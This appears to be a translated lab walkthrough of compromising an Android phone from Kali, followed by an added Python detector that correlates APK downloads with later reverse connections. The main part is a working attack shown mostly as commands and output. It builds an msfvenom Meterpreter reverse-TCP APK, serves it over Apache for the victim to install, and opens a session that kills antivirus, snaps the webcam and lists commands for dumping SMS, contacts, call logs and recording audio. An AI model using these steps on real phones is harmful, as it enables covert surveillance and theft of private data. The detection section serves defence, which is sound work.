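Penetration testing an Android phone with Kali
Lab environment: one Kali virtual machine with 4 GB of memory, IP address 192.168.0.105; one Android phone (an old, unused handset is recommended).
Objective: run an attack test against the Android phone.
Procedure:
(1) Configure the Kali environment
1. Configure the Kali network
┌──(root kali)-[~]
└─# ifconfig    # check Kali's local IP address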
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::20c:29ff:fe43:e515 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:43:e5:15 txqueuelen 1000 (Ethernet)
RX packets 24 bytes 3795 (3.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 2110 (2.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 18 base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 12 bytes 556 (556.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12 bytes 556 (556.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
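2. Generate the attack payload and host it on Kali's web service
┌──(root kali)-[~]
└─# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=8848 R >8848tjsj.apk    # generate the attack file (LHOST is Kali's local IP address, LPORT is Kali's local listening port, R specifies the file format, and apk is the Android executable package format)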
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10187 bytes
┌──(root kali)-[~]
└─# mv /var/www/html/index.html /    # move away or delete the default page file in Kali's Apache
┌──(root kali)-[~]
└─# mv /var/www/inx-debian.html /    # move away or delete the default page file in Kali's Apache
┌──(root kali)-[~]
└─# ls /var/www/html    # check: the web directory is now empty
┌──(root kali)-[~]
└─# cp 8848tjsj.apk /var/www/html    # copy the attack file into Kali's Apache default web directory
┌──(root kali)-[~]
└─# systemctl start apache2.service    # start Kali's Apache service
4. Use the phone to browse to the Kali IP address and download the virus program
3. Start Metasploit and run the penetration test
┌──(root kali)-[~]
└─# msfconsole    # start the testing framework
msf6 > use multi/handler    # load the module
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp    # use the payload set up earlier for attacking the Android phone
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set    # view the configured options
Global
======
No entries in data store.
Module: multi/handler
=====================
Name Value
---- -----
ContextInformationFile
DisablePayloadHandler false
EnableContextEncoding false
ExitOnSession true
ListenerTimeout 0
PAYLOAD android/meterpreter/reverse_tcp
VERBOSE false
WORKSPACE
WfsDelay 0
msf6 exploit(multi/handler) > show options    # view the options that must be set
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 192.168.0.105    # set the local IP address to listen on
lhost => 192.168.0.105
msf6 exploit(multi/handler) > set lport 8848    # set the local listening port
lport => 8848
msf6 exploit(multi/handler) > run    # after running this, tap the virus program installed on the phone
[*] Started reverse TCP handler on 192.168.0.105:8848
[*] Sending stage (76781 bytes) to 192.168.0.103
[*] Meterpreter session 1 opened (192.168.0.105:8848 -> 192.168.0.103:56000) at 2021-02-12 13:18:53 +0800
meterpreter > run killav    # first shut down the antivirus software
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on
meterpreter > webcam_snap    # take a photo
[*]
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/hAwvlKIu.jpeg
meterpreter > ?    # list the available commands
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getuid Get the user that the server is running as
localtime Displays the target system local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information
Application Controller Commands
===============================
Command Description
------- -----------
app_install Request to install apk file
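
Seen from the network side, the download in step 4 and the session in step 3 form a recognisable pair of events: a device fetches an .apk over HTTP from a host and shortly afterwards opens a TCP connection to a non-web port on that same host (here 192.168.0.103 to 192.168.0.105:8848). The detection logic below is an added example, not part of the original post; both log layouts and the sample records are constructed for illustration (the download timestamp is assumed), and only the addresses, port, file name and session time come from the walkthrough.

```python
from datetime import datetime

# Constructed sample records; the field layouts are assumptions, not a real tool's format.
HTTP_LOG = """\
2021-02-12T13:15:02 192.168.0.103 192.168.0.105 GET /8848tjsj.apk 200
2021-02-12T13:16:40 192.168.0.110 192.168.0.1 GET /index.html 200
2021-02-12T13:17:05 192.168.0.111 203.0.113.20 GET /store/app.apk 200
"""
FLOW_LOG = """\
2021-02-12T13:18:53 192.168.0.103 56000 192.168.0.105 8848
2021-02-12T13:19:10 192.168.0.110 51514 192.168.0.1 443
2021-02-12T13:20:00 192.168.0.111 40222 203.0.113.20 443
"""
WEB_PORTS = {80, 443}

def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S")

def apk_downloads(http_log):
    """Yield (time, client, server, uri) for successful .apk fetches."""
    for line in http_log.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip malformed records
        ts, client, server, method, uri, status = fields
        path = uri.split("?", 1)[0].lower()
        if method == "GET" and status == "200" and path.endswith(".apk"):
            yield parse_ts(ts), client, server, uri

def correlate(http_log, flow_log, window_seconds=1800):
    """Flag devices that fetch an APK from a host, then connect to a non-web port on it."""
    downloads = list(apk_downloads(http_log))
    alerts = []
    for line in flow_log.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed records
        ts, src, _sport, dst, dport = fields
        when, port = parse_ts(ts), int(dport)
        if port in WEB_PORTS:
            continue  # ordinary web traffic to the download host is expected
        for d_time, client, server, uri in downloads:
            delay = (when - d_time).total_seconds()
            if (client, server) == (src, dst) and 0 <= delay <= window_seconds:
                alerts.append({"device": src, "host": dst, "port": port, "apk": uri})
    return alerts

if __name__ == "__main__":
    print(correlate(HTTP_LOG, FLOW_LOG))
```

On the sample data only the phone at 192.168.0.103 is flagged; the store download followed by HTTPS traffic to the same server is not.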